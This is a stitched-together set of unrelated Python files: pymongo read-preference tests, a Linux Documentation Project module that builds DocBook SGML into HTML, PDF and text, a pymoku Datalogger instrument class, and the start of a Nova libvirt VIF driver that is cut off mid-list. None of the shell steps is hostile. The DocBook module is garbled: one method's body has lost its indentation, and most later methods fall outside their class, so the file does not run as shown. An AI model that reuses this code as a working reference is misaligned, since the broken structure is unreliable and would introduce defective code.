        self._test_coll_helper(True, self.c.pymongo_test.test, 'distinct', 'a')

    def test_aggregate(self):
        if self.client_version.at_least(2, 1, 0):
            self._test_coll_helper(True, self.c.pymongo_test.test,
                                   'aggregate',
                                   [{'$project': {'_id': 1}}])
class TestMovingAverage(unittest.TestCase):
    """The exponentially-weighted moving average starts empty and updates."""

    def test_moving_average(self):
        tracker = MovingAverage()
        # No samples yet: the average is undefined.
        self.assertIsNone(tracker.get())
        # Feed samples and check the running average after each one.
        for sample, expected in ((10, 10), (20, 12), (30, 15.6)):
            tracker.add_sample(sample)
            self.assertAlmostEqual(expected, tracker.get())
class TestMongosAndReadPreference(unittest.TestCase):
    """Wire-format documents and mongos behavior for read preferences."""

    def test_read_preference_document(self):
        # Each preference must serialize to the exact wire document.
        pref = Primary()
        self.assertEqual(
            pref.document,
            {'mode': 'primary'})

        pref = PrimaryPreferred()
        self.assertEqual(
            pref.document,
            {'mode': 'primaryPreferred'})
        pref = PrimaryPreferred(tag_sets=[{'dc': 'sf'}])
        self.assertEqual(
            pref.document,
            {'mode': 'primaryPreferred', 'tags': [{'dc': 'sf'}]})
        pref = PrimaryPreferred(
            tag_sets=[{'dc': 'sf'}], max_staleness=30)
        self.assertEqual(
            pref.document,
            {'mode': 'primaryPreferred',
             'tags': [{'dc': 'sf'}],
             'maxStalenessSeconds': 30})

        pref = Secondary()
        self.assertEqual(
            pref.document,
            {'mode': 'secondary'})
        pref = Secondary(tag_sets=[{'dc': 'sf'}])
        self.assertEqual(
            pref.document,
            {'mode': 'secondary', 'tags': [{'dc': 'sf'}]})
        pref = Secondary(
            tag_sets=[{'dc': 'sf'}], max_staleness=30)
        self.assertEqual(
            pref.document,
            {'mode': 'secondary',
             'tags': [{'dc': 'sf'}],
             'maxStalenessSeconds': 30})

        pref = SecondaryPreferred()
        self.assertEqual(
            pref.document,
            {'mode': 'secondaryPreferred'})
        pref = SecondaryPreferred(tag_sets=[{'dc': 'sf'}])
        self.assertEqual(
            pref.document,
            {'mode': 'secondaryPreferred', 'tags': [{'dc': 'sf'}]})
        pref = SecondaryPreferred(
            tag_sets=[{'dc': 'sf'}], max_staleness=30)
        self.assertEqual(
            pref.document,
            {'mode': 'secondaryPreferred',
             'tags': [{'dc': 'sf'}],
             'maxStalenessSeconds': 30})

        pref = Nearest()
        self.assertEqual(
            pref.document,
            {'mode': 'nearest'})
        pref = Nearest(tag_sets=[{'dc': 'sf'}])
        self.assertEqual(
            pref.document,
            {'mode': 'nearest', 'tags': [{'dc': 'sf'}]})
        pref = Nearest(
            tag_sets=[{'dc': 'sf'}], max_staleness=30)
        self.assertEqual(
            pref.document,
            {'mode': 'nearest',
             'tags': [{'dc': 'sf'}],
             'maxStalenessSeconds': 30})

        # max_staleness must be a positive integer.
        with self.assertRaises(TypeError):
            Nearest(max_staleness=1.5)  # Float is prohibited.

        with self.assertRaises(ValueError):
            Nearest(max_staleness=0)

        with self.assertRaises(ValueError):
            Nearest(max_staleness=-2)

    def test_maybe_add_read_preference(self):

        # Primary doesn't add $readPreference
        out = _maybe_add_read_preference({}, Primary())
        self.assertEqual(out, {})

        pref = PrimaryPreferred()
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(
            out, SON([("$query", {}), ("$readPreference", pref.document)]))
        pref = PrimaryPreferred(tag_sets=[{'dc': 'nyc'}])
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(
            out, SON([("$query", {}), ("$readPreference", pref.document)]))

        pref = Secondary()
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(
            out, SON([("$query", {}), ("$readPreference", pref.document)]))
        pref = Secondary(tag_sets=[{'dc': 'nyc'}])
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(
            out, SON([("$query", {}), ("$readPreference", pref.document)]))

        # SecondaryPreferred without tag_sets or max_staleness doesn't add
        # $readPreference
        pref = SecondaryPreferred()
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(out, {})
        pref = SecondaryPreferred(tag_sets=[{'dc': 'nyc'}])
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(
            out, SON([("$query", {}), ("$readPreference", pref.document)]))
        pref = SecondaryPreferred(max_staleness=120)
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(
            out, SON([("$query", {}), ("$readPreference", pref.document)]))

        pref = Nearest()
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(
            out, SON([("$query", {}), ("$readPreference", pref.document)]))
        pref = Nearest(tag_sets=[{'dc': 'nyc'}])
        out = _maybe_add_read_preference({}, pref)
        self.assertEqual(
            out, SON([("$query", {}), ("$readPreference", pref.document)]))

        # An existing $query wrapper must be preserved, with $readPreference
        # appended after its other modifiers.
        criteria = SON([("$query", {}), ("$orderby", SON([("_id", 1)]))])
        pref = Nearest()
        out = _maybe_add_read_preference(criteria, pref)
        self.assertEqual(
            out,
            SON([("$query", {}),
                 ("$orderby", SON([("_id", 1)])),
                 ("$readPreference", pref.document)]))
        pref = Nearest(tag_sets=[{'dc': 'nyc'}])
        out = _maybe_add_read_preference(criteria, pref)
        self.assertEqual(
            out,
            SON([("$query", {}),
                 ("$orderby", SON([("_id", 1)])),
                 ("$readPreference", pref.document)]))

    @client_context.require_mongos
    def test_mongos(self):
        shard = client_context.client.config.shards.find_one()['host']
        num_members = shard.count(',') + 1
        if num_members == 1:
            raise SkipTest("Need a replica set shard to test.")
        coll = client_context.client.pymongo_test.get_collection(
            "test",
            write_concern=WriteConcern(w=num_members))
        coll.drop()
        res = coll.insert_many([{} for _ in range(5)])
        first_id = res.inserted_ids[0]
        last_id = res.inserted_ids[-1]

        # Note - this isn't a perfect test since there's no way to
        # tell what shard member a query ran on.
        for pref in (Primary(),
                     PrimaryPreferred(),
                     Secondary(),
                     SecondaryPreferred(),
                     Nearest()):
            qcoll = coll.with_options(read_preference=pref)
            results = list(qcoll.find().sort([("_id", 1)]))
            self.assertEqual(first_id, results[0]["_id"])
            self.assertEqual(last_id, results[-1]["_id"])
            results = list(qcoll.find().sort([("_id", -1)]))
            self.assertEqual(first_id, results[-1]["_id"])
            self.assertEqual(last_id, results[0]["_id"])

    @client_context.require_mongos
    @client_context.require_version_min(3, 3, 12)
    def test_mongos_max_staleness(self):
        # Sanity check that we're sending maxStalenessSeconds
        coll = client_context.client.pymongo_test.get_collection(
            "test", read_preference=SecondaryPreferred(max_staleness=120))
        # No error
        coll.find_one()

        coll = client_context.client.pymongo_test.get_collection(
            "test", read_preference=SecondaryPreferred(max_staleness=10))
        try:
            coll.find_one()
        except OperationFailure as exc:
            # Server rejects staleness below its minimum with error code 160.
            self.assertEqual(160, exc.code)
        else:
            self.fail("mongos accepted invalid staleness")

        coll = single_client(
            readPreference='secondaryPreferred',
            maxStalenessSeconds=120).pymongo_test.test
        # No error
        coll.find_one()

        coll = single_client(
            readPreference='secondaryPreferred',
            maxStalenessSeconds=10).pymongo_test.test
        try:
            coll.find_one()
        except OperationFailure as exc:
            self.assertEqual(160, exc.code)
        else:
            self.fail("mongos accepted invalid staleness")
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
| |
#! /usr/bin/python
# -*- coding: utf8 -*-
#
# Copyright (c) 2016 Linux Documentation Project
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals
import os
import logging
from tldp.utils import which, firstfoundfile
from tldp.utils import arg_isexecutable, isexecutable
from tldp.utils import arg_isreadablefile, isreadablefile
from tldp.doctypes.common import BaseDoctype, SignatureChecker, depends
logger = logging.getLogger(__name__)
def docbookdsl_finder():
    """Return the first modular DSSSL HTML stylesheet (docbook.dsl) found."""
    candidates = [
        '/usr/share/sgml/docbook/stylesheet/dsssl/modular/html/docbook.dsl',
        '/usr/share/sgml/docbook/dsssl-stylesheets/html/docbook.dsl',
    ]
    return firstfoundfile(candidates)
def ldpdsl_finder():
    """Return the LDP DSSSL stylesheet (ldp.dsl) if present on this system."""
    candidates = [
        '/usr/share/sgml/docbook/stylesheet/dsssl/ldp/ldp.dsl',
    ]
    return firstfoundfile(candidates)
class DocbookSGML(BaseDoctype, SignatureChecker):
    """Build pipeline for DocBook SGML 3.x/4.x documents."""

    formatname = 'DocBook SGML 3.x/4.x'
    extensions = ['.sgml']
    # DOCTYPE public identifiers used to recognise this source format.
    signatures = ['-//Davenport//DTD DocBook V3.0//EN',
                  '-//OASIS//DTD DocBook V3.1//EN',
                  '-//OASIS//DTD DocBook V4.1//EN',
                  '-//OASIS//DTD DocBook V4.2//EN', ]

    # Tools and stylesheets that must be available before processing;
    # each value is the validator applied to the configured path.
    required = {'docbooksgml_jw': isexecutable,
                'docbooksgml_openjade': isexecutable,
                'docbooksgml_dblatex': isexecutable,
                'docbooksgml_html2text': isexecutable,
                'docbooksgml_collateindex': isexecutable,
                'docbooksgml_ldpdsl': isreadablefile,
                'docbooksgml_docbookdsl': isreadablefile,
                }
def make_blank_indexsgml(self, **kwargs):
indexsgml = os.path.join(self.source.dirname, 'index.sgml')
self.indexsgml = os.path.isfile(indexsgml)
if self.indexsgml:
return True
'''generate an empty index.sgml file (in output dir)'''
s = '''"{config.docbooksgml_collateindex}" \\
-N \\
-o \\
"index.sgml"'''
return self.shellscript(s, **kwargs)
    @depends(make_blank_indexsgml)
    def move_blank_indexsgml_into_source(self, **kwargs):
        '''move a blank index.sgml file into the source tree'''
        if self.indexsgml:
            # The source tree already provides index.sgml; nothing to move.
            return True
        s = '''mv \\
              --no-clobber \\
              --verbose \\
              -- "index.sgml" "{source.dirname}/index.sgml"'''
        indexsgml = os.path.join(self.source.dirname, 'index.sgml')
        if not self.config.script:
            # Track the copied file so it is cleaned up after the build.
            self.removals.add(indexsgml)
        return self.shellscript(s, **kwargs)
    @depends(move_blank_indexsgml_into_source)
    def make_data_indexsgml(self, **kwargs):
        '''collect document's index entries into a data file (HTML.index)'''
        if self.indexsgml:
            # Source shipped its own index.sgml; no need to harvest entries.
            return True
        s = '''"{config.docbooksgml_openjade}" \\
              -t sgml \\
              -V html-index \\
              -d "{config.docbooksgml_docbookdsl}" \\
              "{source.filename}"'''
        return self.shellscript(s, **kwargs)
    @depends(make_data_indexsgml)
    def make_indexsgml(self, **kwargs):
        '''generate the final document index file (index.sgml)'''
        if self.indexsgml:
            return True
        # Collate the harvested HTML.index entries into index.sgml.
        s = '''"{config.docbooksgml_collateindex}" \\
              -g \\
              -t Index \\
              -i doc-index \\
              -o "index.sgml" \\
              "HTML.index" \\
              "{source.filename}"'''
        return self.shellscript(s, **kwargs)
    @depends(make_indexsgml)
    def move_indexsgml_into_source(self, **kwargs):
        '''move the generated index.sgml file into the source tree'''
        if self.indexsgml:
            return True
        indexsgml = os.path.join(self.source.dirname, 'index.sgml')
        # --force here (unlike the blank move) overwrites the placeholder.
        s = '''mv \\
              --verbose \\
              --force \\
              -- "index.sgml" "{source.dirname}/index.sgml"'''
        logger.debug("%s creating %s", self.source.stem, indexsgml)
        if not self.config.script:
            # Schedule the generated file for post-build removal.
            self.removals.add(indexsgml)
        return self.shellscript(s, **kwargs)
    @depends(move_indexsgml_into_source)
    def cleaned_indexsgml(self, **kwargs):
        '''clean the junk from the output dir after building the index.sgml'''
        # -- be super cautious before removing a bunch of files
        if not self.config.script:
            cwd = os.getcwd()
            if not os.path.samefile(cwd, self.output.dirname):
                # Refuse to delete anything outside the expected output dir.
                logger.error("%s (cowardly) refusing to clean directory %s",
                             self.source.stem, cwd)
                logger.error("%s expected to find %s",
                             self.source.stem, self.output.dirname)
                return False
        # Delete every top-level non-directory except the checksum file.
        preserve = os.path.basename(self.output.MD5SUMS)
        s = '''find . -mindepth 1 -maxdepth 1 -not -type d -not -name {} -delete -print'''
        s = s.format(preserve)
        return self.shellscript(s, **kwargs)
@depends(cleaned_indexsgml)
def make_htmls(self, **kwargs):
    '''create a single page HTML output (with incorrect name)'''
    # jw writes the chunk-less page under its own default name; a later
    # step renames it to the standard single-page name.
    jw_cmd = '''"{config.docbooksgml_jw}" \\
-f docbook \\
-b html \\
--dsl "{config.docbooksgml_ldpdsl}#html" \\
-V nochunks \\
-V '%callout-graphics-path%=images/callouts/' \\
-V '%stock-graphics-extension%=.png' \\
--output . \\
"{source.filename}"'''
    return self.shellscript(jw_cmd, **kwargs)
@depends(make_htmls)
def make_name_htmls(self, **kwargs):
    '''correct the single page HTML output name'''
    rename_cmd = 'mv -v --no-clobber -- "{output.name_html}" "{output.name_htmls}"'
    return self.shellscript(rename_cmd, **kwargs)
@depends(make_name_htmls)
def make_name_txt(self, **kwargs):
    '''create text output (from single-page HTML)'''
    # html2text renders the already-built single-page HTML; stdout is
    # redirected into the final .txt output name.
    s = '''"{config.docbooksgml_html2text}" > "{output.name_txt}" \\
-style pretty \\
-nobs \\
"{output.name_htmls}"'''
    return self.shellscript(s, **kwargs)
def make_pdf_with_jw(self, **kwargs):
    '''use jw (openjade) to create a PDF'''
    jw_cmd = '''"{config.docbooksgml_jw}" \\
-f docbook \\
-b pdf \\
--output . \\
"{source.filename}"'''
    return self.shellscript(jw_cmd, **kwargs)
def make_pdf_with_dblatex(self, **kwargs):
    '''use dblatex (fallback) to create a PDF'''
    dblatex_cmd = '''"{config.docbooksgml_dblatex}" \\
-F sgml \\
-t pdf \\
-o "{output.name_pdf}" \\
"{source.filename}"'''
    return self.shellscript(dblatex_cmd, **kwargs)
@depends(cleaned_indexsgml)
def make_name_pdf(self, **kwargs):
    '''create the PDF output; try jw first, fall back to dblatex'''
    docstem = self.source.stem
    cls = self.__class__.__name__
    logger.info("%s calling method %s.%s", docstem, cls, 'make_pdf_with_jw')
    if self.make_pdf_with_jw(**kwargs):
        return True
    # jw could not produce a PDF; dblatex is the second-choice toolchain.
    logger.error("%s jw failed creating PDF, falling back to dblatex...",
                 docstem)
    logger.info("%s calling method %s.%s",
                docstem, cls, 'make_pdf_with_dblatex')
    return self.make_pdf_with_dblatex(**kwargs)
@depends(make_name_htmls)
def make_html(self, **kwargs):
    '''create chunked HTML outputs'''
    # Same jw invocation as the single-page build but without the
    # "nochunks" variable, so output is split into one file per section.
    s = '''"{config.docbooksgml_jw}" \\
-f docbook \\
-b html \\
--dsl "{config.docbooksgml_ldpdsl}#html" \\
-V '%callout-graphics-path%=images/callouts/' \\
-V '%stock-graphics-extension%=.png' \\
--output . \\
"{source.filename}"'''
    return self.shellscript(s, **kwargs)
@depends(make_html)
def make_name_html(self, **kwargs):
    '''rename openjade's index.html to LDP standard name STEM.html'''
    rename_cmd = 'mv -v --no-clobber -- "{output.name_indexhtml}" "{output.name_html}"'
    return self.shellscript(rename_cmd, **kwargs)
@depends(make_name_html)
def make_name_indexhtml(self, **kwargs):
    '''create final index.html symlink'''
    link_cmd = 'ln -svr -- "{output.name_html}" "{output.name_indexhtml}"'
    return self.shellscript(link_cmd, **kwargs)
@classmethod
def argparse(cls, p):
    """Register this format's command-line options on parser *p*.

    Adds a single argument group holding the paths to the stylesheets
    and executables the docbook-SGML toolchain needs; defaults are
    discovered from the local system (finder helpers / $PATH lookup).
    """
    descrip = 'executables and data files for %s' % (cls.formatname,)
    g = p.add_argument_group(title=cls.__name__, description=descrip)
    # Stylesheets (validated as readable files).
    g.add_argument('--docbooksgml-docbookdsl', type=arg_isreadablefile,
                   default=docbookdsl_finder(),
                   help='full path to html/docbook.dsl [%(default)s]')
    g.add_argument('--docbooksgml-ldpdsl', type=arg_isreadablefile,
                   default=ldpdsl_finder(),
                   help='full path to ldp/ldp.dsl [%(default)s]')
    # Toolchain executables (validated as executable files).
    g.add_argument('--docbooksgml-jw', type=arg_isexecutable,
                   default=which('jw'),
                   help='full path to jw [%(default)s]')
    g.add_argument('--docbooksgml-html2text', type=arg_isexecutable,
                   default=which('html2text'),
                   help='full path to html2text [%(default)s]')
    g.add_argument('--docbooksgml-openjade', type=arg_isexecutable,
                   default=which('openjade'),
                   help='full path to openjade [%(default)s]')
    g.add_argument('--docbooksgml-dblatex', type=arg_isexecutable,
                   default=which('dblatex'),
                   help='full path to dblatex [%(default)s]')
    g.add_argument('--docbooksgml-collateindex', type=arg_isexecutable,
                   default=which('collateindex.pl'),
                   help='full path to collateindex [%(default)s]')
#
# -- end of file
| |
from ._instrument import ADC_SMP_RATE
from ._instrument import CHN_BUFLEN
from ._instrument import ROLL
from ._instrument import needs_commit
from ._instrument import log
from ._instrument import to_reg_unsigned, from_reg_unsigned
from . import _stream_instrument
from . import _waveform_generator
from . import _utils
# Register addresses in the Datalogger bitstream.
REG_DL_OUTSEL = 64
REG_DL_ACTL = 66
REG_DL_DECIMATION = 65
# REG_DL_OUTSEL constants
_DL_SOURCE_ADC1 = 0
_DL_SOURCE_ADC2 = 1
_DL_SOURCE_DAC1 = 2
_DL_SOURCE_DAC2 = 3
_DL_SOURCE_EXT = 4
# DAC loopback rounding behaviour (REG_DL_ACTL bits).
_DL_LB_ROUND = 0
_DL_LB_CLIP = 1
# Acquisition modes: direct downsampling vs decimation (precision).
_DL_AIN_DDS = 0
_DL_AIN_DECI = 1
_DL_ADC_SMPS = ADC_SMP_RATE
_DL_BUFLEN = CHN_BUFLEN
_DL_SCREEN_WIDTH = 1024
_DL_ROLL = ROLL
# Supported sample-rate range.
_DL_SAMPLERATE_MIN = 10  # Smp/s
_DL_SAMPLERATE_MAX = _DL_ADC_SMPS  # 500MSmp/s
class Datalogger(_stream_instrument.StreamBasedInstrument,
                 _waveform_generator.BasicWaveformGenerator):
    """ Datalogger instrument object.

    To run a new Datalogger instrument, this should be instantiated and
    deployed via a connected
    :any:`Moku` object using :any:`deploy_instrument`. Alternatively,
    a pre-configured instrument object
    can be obtained by discovering an already running Datalogger instrument
    on a Moku:Lab device via
    :any:`discover_instrument`.

    .. automethod:: pymoku.instruments.Datalogger.__init__

    .. attribute:: type
        :annotation: = "datalogger"

        Name of this instrument.
    """
    def __init__(self):
        """Create a new Datalogger instrument, ready to deploy to a Moku.
        """
        super(Datalogger, self).__init__()
        self._register_accessors(_dl_reg_handlers)
        self.id = 7
        self.type = "datalogger"
        self.calibration = None
        # TODO: Allow user to disable logging of either channel
        self.logname = "MokuDataloggerData"
        self.binstr = "<s32"
        self.procstr = ['', '']
        self.hdrstr = ''
        self.fmtstr = ''
        self.timestep = 1

    @needs_commit
    def set_defaults(self):
        """Reset the Datalogger to sane defaults: roll mode, 1kSmp/s,
        both analog inputs enabled, waveform generator off."""
        # Force X-Mode to be "roll" for streaming
        super(Datalogger, self).set_defaults()
        self.x_mode = _DL_ROLL
        self.set_samplerate(1e3)
        self.framerate = 0
        # Disable the waveform generator by default
        # TODO: Disable without using a gen_ function
        self.gen_off()
        self.set_source(1, 'in1')
        self.set_source(2, 'in2')
        self.set_precision_mode(False)
        self._set_pause(False)
        self.set_frontend(1, fiftyr=True, atten=False, ac=False)
        self.set_frontend(2, fiftyr=True, atten=False, ac=False)
        self.en_in_ch1 = True
        self.en_in_ch2 = True

    @needs_commit
    def set_samplerate(self, samplerate):
        """ Manually set the sample rate of the instrument.

        This interface allows you to specify the rate at which data is sampled.

        .. note::
            The samplerate must be set to within the allowed range for your
            datalogging session type.
            See the Datalogger instrument tutorial for more details.

        :type samplerate: float; *0 < samplerate < 500Msmp/s*
        :param samplerate: Target samples per second. Will get rounded to the
            nearest unit.
        :raises ValueOutOfRangeException: if samplerate is out of range.
        """
        _utils.check_parameter_valid('range', samplerate,
                                     [_DL_SAMPLERATE_MIN, _DL_SAMPLERATE_MAX],
                                     'samplerate', 'Hz'
                                     )
        # NOTE(review): decimation may be fractional here; the register
        # packing presumably truncates it -- TODO confirm rounding behaviour.
        decimation = _DL_ADC_SMPS / float(samplerate)
        self.decimation_rate = decimation
        self.timestep = 1.0 / (_DL_ADC_SMPS / decimation)

    def get_samplerate(self):
        """ :return: The current instrument sample rate """
        if(self.decimation_rate == 0):
            log.warning("Decimation rate appears to be unset.")
            return _DL_ADC_SMPS
        return _DL_ADC_SMPS / float(self.decimation_rate)

    @needs_commit
    def set_precision_mode(self, state):
        """ Change aquisition mode between downsampling and decimation.

        Precision mode, a.k.a Decimation, samples at full rate and applies a
        low-pass filter to the data. This improves
        precision. Normal mode works by direct downsampling, throwing away
        points it doesn't need.

        :param state: Select Precision Mode
        :type state: bool

        :raises ValueError: if input parameter is invalid
        """
        _utils.check_parameter_valid('bool', state, desc='precision mode')
        self.ain_mode = _DL_AIN_DECI if state else _DL_AIN_DDS

    def is_precision_mode(self):
        """ :return: True if precision (decimation) acquisition is active """
        # BUGFIX: use equality, not identity. 'is' on ints only works by
        # accident of CPython small-int interning.
        return self.ain_mode == _DL_AIN_DECI

    @needs_commit
    def set_source(self, ch, source, lmode='round'):
        """ Sets the source of the channel data to either the analog input or
        internally looped-back digital output.

        This feature allows the user to capture the Waveform Generator outputs.

        :type ch: int; {1,2}
        :param ch: Channel Number

        :type source: string, {'in1', 'in2', 'out1','out2', 'ext'}
        :param source: Where the specified channel should source data from
            (either the input or internally looped back output)

        :type lmode: string, {'clip','round'}
        :param lmode: DAC Loopback mode (ignored 'in' sources)

        :raises ValueOutOfRangeException: if the channel number is incorrect
        :raises ValueError: if any of the string parameters are incorrect
        """
        _str_to_lmode = {
            'round': _DL_LB_ROUND,
            'clip': _DL_LB_CLIP
        }
        _str_to_channel_data_source = {
            'in1': _DL_SOURCE_ADC1,
            'in2': _DL_SOURCE_ADC2,
            'out1': _DL_SOURCE_DAC1,
            'out2': _DL_SOURCE_DAC2,
            'ext': _DL_SOURCE_EXT
        }
        _utils.check_parameter_valid('set', ch, [1, 2], 'channel')
        source = _utils.str_to_val(_str_to_channel_data_source, source,
                                   'channel data source')
        lmode = _utils.str_to_val(_str_to_lmode, lmode, 'DAC loopback mode')
        if ch == 1:
            self.source_ch1 = source
            # Loopback mode only makes sense when sourcing from a DAC.
            if source in [_DL_SOURCE_DAC1, _DL_SOURCE_DAC2]:
                self.loopback_mode_ch1 = lmode
        elif ch == 2:
            self.source_ch2 = source
            if source in [_DL_SOURCE_DAC1, _DL_SOURCE_DAC2]:
                self.loopback_mode_ch2 = lmode

    def _update_datalogger_params(self):
        """Refresh the per-channel scaling, format and header strings used
        when writing out logged data."""
        scales = self._calculate_scales()
        samplerate = self.get_samplerate()
        self.timestep = 1.0 / samplerate
        # Use the new scales to decide on the processing string
        self.procstr[0] = "*{:.15f}".format(scales['scale_ch1'])
        self.procstr[1] = "*{:.15f}".format(scales['scale_ch2'])
        self.fmtstr = self._get_fmtstr(self.ch1, self.ch2)
        self.hdrstr = self._get_hdrstr(self.ch1, self.ch2)

    def _on_reg_sync(self):
        """Recompute the timestep after register state is pulled from the
        device (decimation_rate may have changed)."""
        super(Datalogger, self)._on_reg_sync()
        if self.decimation_rate == 0:
            self.timestep = 1.0 / (_DL_ADC_SMPS)
        else:
            samplerate = _DL_ADC_SMPS / float(self.decimation_rate)
            self.timestep = 1.0 / samplerate

    def _get_hdrstr(self, ch1, ch2):
        """Build the CSV header block describing frontend settings,
        acquisition rate/mode, clock source and column names for the
        enabled channels."""
        chs = [ch1, ch2]
        hdr = "% Moku:Datalogger\r\n"
        for i, c in enumerate(chs):
            if c:
                r = self.get_frontend(i + 1)
                hdr += ("% Ch {i} - {} coupling, {} Ohm impedance, "
                        "{} V range\r\n").format("AC" if r[2] else "DC",
                                                 "50" if r[0] else "1M",
                                                 "10" if r[1] else "1",
                                                 i=i + 1)
        hdr += ("% Acquisition rate: {:.10e} Hz, "
                "{} mode\r\n").format(self.get_samplerate(),
                                      "Precision" if self.is_precision_mode()
                                      else "Normal"
                                      )
        hdr += "% {} 10 MHz clock\r\n".format(
            "External"
            if self._moku._get_actual_extclock()
            else "Internal"
        )
        hdr += "% Acquired {}\r\n".format(_utils.formatted_timestamp())
        hdr += "% Time"
        for i, c in enumerate(chs):
            if c:
                hdr += ", Ch {i} voltage (V)".format(i=i + 1)
        hdr += "\r\n"
        return hdr

    def _get_fmtstr(self, ch1, ch2):
        """Build the per-row format string: timestamp plus one column per
        enabled channel."""
        chs = [ch1, ch2]
        fmtstr = "{t:.10e}"
        for i, c in enumerate(chs):
            if c:
                fmtstr += ",{{ch{i}:.10e}}".format(i=i + 1)
        fmtstr += "\r\n"
        return fmtstr

    def _deci_gain(self):
        """Gain introduced by the decimation filter, used to renormalise
        data captured in precision mode."""
        if self.decimation_rate == 0:
            return 1
        if self.decimation_rate < 2**20:
            return self.decimation_rate
        else:
            return self.decimation_rate / 2**10

    def _calculate_scales(self):
        """Compute the raw-count-to-volts scale factor for each channel,
        accounting for source selection, precision mode and DAC loopback
        rounding; returns a dict of scales and the underlying gains."""
        g1, g2 = self._adc_gains()
        d1, d2 = self._dac_gains()
        # Indexed by the _DL_SOURCE_* constants; 2.0**-11 is the external
        # input scale.
        gains = [g1, g2, d1, d2, 2.0**-11]
        l1 = self.loopback_mode_ch1
        l2 = self.loopback_mode_ch2
        s1 = self.source_ch1
        s2 = self.source_ch2
        scale_ch1 = gains[s1]
        scale_ch2 = gains[s2]
        if self.ain_mode == _DL_AIN_DECI:
            scale_ch1 /= self._deci_gain()
            scale_ch2 /= self._deci_gain()

        def _compute_total_scaling_factor(adc, dac, src, lmode):
            # Change scaling factor depending on the source type
            if src in [_DL_SOURCE_ADC1, _DL_SOURCE_ADC2]:
                scale = 1.0
            elif src in [_DL_SOURCE_DAC1, _DL_SOURCE_DAC2]:
                if(lmode == _DL_LB_CLIP):
                    scale = 1.0
                else:  # Rounding mode
                    scale = 16.0
            else:
                # NOTE(review): returns None here, which makes the '*='
                # below raise TypeError -- presumably unreachable because
                # sources are register-validated; confirm.
                log.error("Invalid source type on channel.")
                return
            return scale
        # These are the combined scaling factors for both channel 1
        # and channel 2 raw data
        scale_ch1 *= _compute_total_scaling_factor(g1, d1, s1, l1)
        scale_ch2 *= _compute_total_scaling_factor(g2, d2, s2, l2)
        return {'scale_ch1': scale_ch1,
                'scale_ch2': scale_ch2,
                'gain_adc1': g1,
                'gain_adc2': g2,
                'gain_dac1': d1,
                'gain_dac2': d2,
                'source_ch1': s1,
                'source_ch2': s2,
                'gain_loopback1': l1,
                'gain_loopback2': l2
                }
# Register accessor map: attribute name -> (register, packer, unpacker).
# Bit positions/widths below must match the Datalogger FPGA bitstream.
_dl_reg_handlers = {
    'source_ch1':
        (REG_DL_OUTSEL,
         # bits [7:0]: channel 1 data source selector
         to_reg_unsigned(0, 8, allow_set=[_DL_SOURCE_ADC1,
                                          _DL_SOURCE_ADC2,
                                          _DL_SOURCE_DAC1,
                                          _DL_SOURCE_DAC2,
                                          _DL_SOURCE_EXT]),
         from_reg_unsigned(0, 8)),
    'source_ch2':
        (REG_DL_OUTSEL,
         # bits [15:8]: channel 2 data source selector
         to_reg_unsigned(8, 8, allow_set=[_DL_SOURCE_ADC1,
                                          _DL_SOURCE_ADC2,
                                          _DL_SOURCE_DAC1,
                                          _DL_SOURCE_DAC2,
                                          _DL_SOURCE_EXT]),
         from_reg_unsigned(8, 8)),
    'loopback_mode_ch1':
        (REG_DL_ACTL,
         # bit 0: channel 1 DAC loopback rounding behaviour
         to_reg_unsigned(0, 1, allow_set=[_DL_LB_CLIP,
                                          _DL_LB_ROUND]),
         from_reg_unsigned(0, 1)),
    'loopback_mode_ch2':
        (REG_DL_ACTL,
         # bit 1: channel 2 DAC loopback rounding behaviour
         to_reg_unsigned(1, 1, allow_set=[_DL_LB_CLIP,
                                          _DL_LB_ROUND]),
         from_reg_unsigned(1, 1)),
    'ain_mode':
        (REG_DL_ACTL,
         # bits [17:16]: acquisition mode (downsample vs decimate)
         to_reg_unsigned(16, 2, allow_set=[_DL_AIN_DDS,
                                           _DL_AIN_DECI]),
         from_reg_unsigned(16, 2)),
    'decimation_rate':
        (REG_DL_DECIMATION,
         # full 32-bit decimation factor
         to_reg_unsigned(0, 32),
         from_reg_unsigned(0, 32))
}
| |
# Copyright (C) 2011 Midokura KK
# Copyright (C) 2011 Nicira, Inc
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""VIF drivers for libvirt."""
import copy
import os
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.network import linux_net
from nova.network import model as network_model
from nova import objects
from nova import utils
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import designer
LOG = logging.getLogger(__name__)
libvirt_vif_opts = [
    cfg.BoolOpt('use_virtio_for_bridges',
                default=True,
                help='Use virtio for bridge interfaces with KVM/QEMU'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_vif_opts, 'libvirt')
CONF.import_opt('use_ipv6', 'nova.netconf')
# Prefix used when deriving an ethernet-style device name from a VIF.
DEV_PREFIX_ETH = 'eth'
# vhostuser queues support
# Minimum libvirt version supporting multiqueue on vhostuser ports.
MIN_LIBVIRT_VHOSTUSER_MQ = (1, 2, 17)
def is_vif_model_valid_for_virt(virt_type, vif_model):
    """Check whether *vif_model* may be used with the given virt type.

    :param virt_type: hypervisor type ('qemu', 'kvm', 'xen', 'lxc', 'uml')
    :param vif_model: NIC model name, or None to let libvirt choose
    :returns: True if the model is acceptable (None always is)
    :raises exception.UnsupportedVirtType: for an unknown virt_type
    """
    # qemu and kvm accept exactly the same set of models; define the
    # list once instead of maintaining two identical copies.
    _qemu_kvm_models = [network_model.VIF_MODEL_VIRTIO,
                        network_model.VIF_MODEL_NE2K_PCI,
                        network_model.VIF_MODEL_PCNET,
